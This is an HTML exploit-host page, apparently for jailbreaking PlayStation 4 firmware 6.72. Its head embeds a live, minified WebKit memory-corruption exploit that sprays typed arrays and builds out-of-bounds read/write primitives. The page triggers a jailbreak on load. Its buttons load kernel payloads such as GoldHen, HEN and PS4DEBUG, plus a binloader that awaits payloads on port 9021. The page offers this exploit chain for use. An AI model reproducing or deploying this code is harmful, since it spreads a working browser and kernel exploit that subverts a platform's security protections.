<html manifest="offlinexmb.cache">
<head style="background-color:#050505;">
     <meta charset="UTF-8" />
  <title>Omar ALPrincE Host New Exploit 6.72 FW</title>
  <meta name="viewport" content="width=device-width, initial-scale=1">
 <style>
 .button {
		  background:rgba(0,0,0,0.5);
		  box-shadow: 0 5px 20px 0 white;
		  border: 2px solid black;
		  border-radius: 10px;
		  color: white;
		  text-decoration: none;
		  width: 200px;
          height: 40px;
		  display:inline-table;
		  font-family: system-ui;
		  text-align: center;
		}

.button:focus,
	.button:hover {
		  color: White;
		  box-shadow: 0 5px 50px 0 white;
		  background-color: #0F0F53;
          border-radius: 10px;
		}
.modal {
  display: none; /* Hidden by default */
  position: fixed; /* Stay in place */
  z-index: 1; /* Sit on top */
  padding-top: 100px; /* Location of the box */
  left: 0;
  top: 0;
  width: 100%; /* Full width */
  height: 100%; /* Full height */
  overflow: auto; /* Enable scroll if needed */
  background-color: rgb(0,0,0); /* Fallback color */
  background-color: rgba(0,0,0,0.4); /* Black w/ opacity */
}
 .content {
  width:80%;
  height:15%;
  margin-left:7.5%;
  background:rgba(0,0,0,0.5);
  color:white;
  margin-top:1%;
  font-size:25px;
  text-align:center;
  border-radius:30px;
  padding:20px;
  line-height:12px;
 }
 .title {
  font-size:40px;
  margin:0;
  padding:0;
  box-sizing:border-box;
  font-weight:bolder;
  margin-bottom:10px;
 }
 .yellow {
  color:yellow;
 }
 .hue {
  color:yellow;
  padding:10px;
  border-radius:10px;
  animation:hue 5s linear infinite;
  -webkit-animation: hue 5s linear infinite;
  box-shadow: 0px 0px 50px yellow;
  color:white;
  background:rgba(255,255,0,0.4);
 }
 .hue:hover{
  color:yellow;
  background:transparent;
 }
 @keyframes hue{
 0%{
 filter:hue-rotate(0deg);
 -webkit-filter:hue-rotate(0deg);
 }
 10%{
 box-shadow: 0px 1px 50px yellow;
 }
 20%{
 box-shadow: 1px 1px 50px yellow;
 }
 30%{
 box-shadow: 1px 0px 50px yellow;
 }
 40%{
  box-shadow: 1px -1px 50px yellow;
 }
 50%{
 box-shadow: 0px -1px 50px yellow;
 }
 60%{
 box-shadow: -1px -1px 50px yellow;
 }
 70%{
 box-shadow: -1px 0px 50px yellow;
 }
 80%{
 box-shadow: -1px 1px 50px yellow;
 }
 90%{
 box-shadow: 0px 1px 50px yellow;
 }
 100%{
 filter:hue-rotate(360deg);
 -webkit-filter:hue-rotate(360deg);
 }
 }
 .text {
  padding-bottom:50px;
 }
  .back {
   font-size:25px;
   margin-top:10px;
   display:block;
   line-height:55px;
   width:20%;
   text-decoration:none;
   height:50px;
   background:white;
   color:black;
   border-radius:15px;
  }
  .back:hover{
   border:2px solid white;
   background:transparent;
   box-sizing:border-box;
   color:white;
  }
/* Modal Content */
.modal-content {
  font-family: BFARNAZ;
  font-size: 18px;
  position: relative;
  background-color: #dddddd;
  margin: auto;
  padding: 0;
  border: 1px solid #888;
  width: 50%;
  box-shadow: 0 4px 8px 0 rgba(0,0,0,0.2),0 6px 20px 0 rgba(0,0,0,0.19);
  -webkit-animation-name: animatetop;
  -webkit-animation-duration: 0.4s;
  animation-name: animatetop;
  animation-duration: 0.4s
}
.pointer {cursor: pointer;}
	</style>
	<script>
var leaker_obj={a:0};var leaker_arr=new Uint32Array(6);var oob_slave=new Uint8Array(1024);var oob_master=new Uint32Array(7);var spray=[];function spray_one(){var x=new Uint32Array(1);x[spray.length+'spray']=123;spray.push(x);}for(var i=0;i<0x10000;i++)spray_one();var target={a:2.1100820415101592e-303,b:false,c:true,d:5678};var target2={a:2.1100820415101592e-303,b:false,c:true,e:5678};var impl_idx=0;function create_impl(){var ans={a:target};for(var i=0;i<32;i++)ans[(impl_idx++)+'x']={};return ans;}function trigger(x){if(impl.a!=target){print("wtf?");while(1);}var o={a:1};for(var i in o){{i=x;function i(){};}o[i];}if(impl.a!=target){print("corrupted!");print(typeof(impl.a));print(impl.a.length);target.c=leaker_obj;leaker_obj.a=leaker_obj;var l1=impl.a[4];var l2=impl.a[5];leaker_obj.a=oob_slave;var s1=impl.a[4];var s2=impl.a[5];target.c=leaker_arr;impl.a[4]=l1;impl.a[5]=l2;target.c=oob_master;impl.a[4]=s1;impl.a[5]=s2;impl.a=target;print([l1,l2,s1,s2]);throw"exploit fucking finished";}}try{for(var _=0;_<1024;_++){var impl=create_impl();var s={a:impl};trigger(s);}}catch(e){print("error: "+e);}

  window.applicationCache.ondownloading=function(){document.getElementById("progress").innerHTML="Page Caching Started!!"};
  window.applicationCache.onprogress=function(a){document.getElementById("progress").innerHTML="Caching Status: "+(Math.round(100*(a.loaded/a.total)))+"% Completed"};
  window.applicationCache.oncached=function(){document.getElementById("progress").innerHTML="Page Cached Successfully!!";setTimeout(function(){document.getElementById("progress").innerHTML="Turn Off the Internet & Reopen the Browser!!"; }, 1500);};
    window.applicationCache.onnoupdate=function(){jailbreak();p.write8(0, 0);};
  window.applicationCache.onerror=function(){jailbreak();p.write8(0, 0);};
</script>
</head>
<body style="margin:0;background-color:#050505;">
<script>
function gold() {
progress.innerHTML="<div>Loading GoldHen 1.1 ...</div>";
start_exploit();
start_exploit();
try {
	  stagegold();
	} catch (e) {
		alert(e);
	}
}

function gold1() {
progress.innerHTML="<div>Loading GoldHen 1.0 ...</div>";
start_exploit();
start_exploit();
try {
	  stagegold1();
	} catch (e) {
		alert(e);
	}
}   

function gold2b() {
progress.innerHTML="<div>Loading GoldHen 2.0b ...</div>";
var script = document.createElement('script');script.src = "goldhen2b.js";document.getElementsByTagName('head')[0].appendChild(script);
var script = document.createElement('script');script.src = "binloader.js";document.getElementsByTagName('head')[0].appendChild(script);
}

function gold2b2() {
progress.innerHTML="<div>Loading GoldHen 2.0b2 ...</div>";
var script = document.createElement('script');script.src = "goldhen2b2672.js";document.getElementsByTagName('head')[0].appendChild(script);
var script = document.createElement('script');script.src = "binloader.js";document.getElementsByTagName('head')[0].appendChild(script);
}

function webrte() {
    progress.innerHTML="<div>Loading WebRTE ...</div>";
    start_exploit();
    start_exploit();
   try {
	  stagewebrte();
	} catch (e) {
		alert(e);
	}
}

function ps4debug() {
progress.innerHTML="<div>Loading PS4DEBUG ...</div>";
    start_exploit();
    start_exploit();
   try {
	  stageps4debug();
	} catch (e) {
		alert(e);
	}
}

function binloader() {
progress.innerHTML="<div>Loading Binloader ...</div>";
setTimeout(function(){awaitpl();},500);
var script = document.createElement('script');script.src = "binloader.js";document.getElementsByTagName('head')[0].appendChild(script);
}

function dupdate() {
progress.innerHTML="<div>Loading Disable Update ...</div>";
var script = document.createElement('script');script.src = "dupdate.js";document.getElementsByTagName('head')[0].appendChild(script);
var script = document.createElement('script');script.src = "binloader.js";document.getElementsByTagName('head')[0].appendChild(script);
}

function hen() {
progress.innerHTML="<div>Loading HEN ...</div>";
var script = document.createElement('script');script.src = "hen213b.js";document.getElementsByTagName('head')[0].appendChild(script);
var script = document.createElement('script');script.src = "binloader.js";document.getElementsByTagName('head')[0].appendChild(script);
}

function awaitpl() {
      document.getElementById("mexp").style.display = "none";
      document.getElementById("Omar ALPrincE").style.display = "none";
      document.getElementById("awaiting").style.display = "block";
    }
</script>
<br><h1 style='font-size:25px;text-align:center;text-shadow: 4px 4px 4px black;color:yellow;'>Omar ALPrincE Host New Exploit 6.72 FW</h1>
<br>
<h1 id=progress style='font-size:25px;text-align:center;text-shadow: 4px 4px 4px black;color:white;'>Status</h1>
<br><div id="mexp">
<div align="center">
<a  class="button pointer"  onclick="gold1(); return false" style="font-size:25px;text-align:center;text-shadow: 4px 4px 4px black;color:yellow">GoldHenV1.0</a>
<a  class="button pointer"  onclick="gold(); return false" style="font-size:25px;text-align:center;text-shadow: 4px 4px 4px black;color:yellow">GoldHenV1.1</a>
<a  class="button pointer"  onclick="gold2b(); return false" style="font-size:25px;text-align:center;text-shadow: 4px 4px 4px black;color:yellow">GoldHenV2b</a>
<a  class="button pointer"  onclick="gold2b2(); return false" style="font-size:25px;text-align:center;text-shadow: 4px 4px 4px black;color:yellow">GoldHenV2b2</a>
<br><br>
<a  class="button pointer" onclick="ps4debug(); return false" style="font-size:25px;text-align:center;text-shadow: 4px 4px 4px black;color:white">PS4DEBUG</a>
<a  class="button pointer" onclick="webrte(); return false" style="font-size:25px;text-align:center;background-color:blue;text-shadow: 4px 4px 4px black;color:white">WebRTE</a>
</div>
<br>
<div align="center">
<h1 style='font-size:25px;text-align:center;text-shadow: 4px 4px 4px black;color:yellow;'>Payloads with run on old Loader</h1>
<a  class="button pointer" onclick="binloader(); return false" style="font-size:25px;text-align:center;text-shadow: 4px 4px 4px black;color:white">Binloader</a>
<a  class="button pointer" onclick="hen(); return false" style="font-size:25px;text-align:center;text-shadow: 4px 4px 4px black;color:white">Hen213b</a>
<a  class="button pointer" onclick="dupdate(); return false" style="font-size:25px;text-align:center;text-shadow: 4px 4px 4px black;color:white">Disable_Update</a>
</div>
</div>
<div id="awaiting" class="info" style="margin-top: 10%;font-size:40px;text-align:center;text-shadow: 4px 4px 4px black;color:white;display:none;">
    Awaiting Payload...(Send Payload To Port 9021)
  </div>
<br/>
<div id="Omar ALPrincE" class="content" >
 	    <div class="text" >
 	        <br><span style="text-shadow: 4px 4px 4px black;" class="yellow" >Designed, Ported and Compiled by :</span >&nbsp;&nbsp; <span style="text-shadow: 4px 4px 4px black;" class="hue" >Omar ALPrincE</span>
 	        <br><br><br><br><span style="text-shadow: 4px 4px 4px black;" class="yellow" >Super Special Thanks To :</span >&nbsp;&nbsp; <a style="font-size:30px;text-align:center;text-shadow: 4px 4px 4px black;color:white;">Sleirsgoevy , Al Azif , ChendoChap , SiSTRo , ... </a>
	     </div>
</div>
  <script src="./rop.js"></script>
  <script src="./syscalls.js"></script>
  <script src="./expl.js"></script>
  <script src="./exploit.js"></script>
  <script src="./goldhen.js"></script>
  <script src="./goldhen1.js"></script> 
<script src="./ps4debug.js"></script>
  <script src="./webrte.js"></script>
  <script src="./jb.js"></script>
  <pre id="console"></pre>
</body>
</html>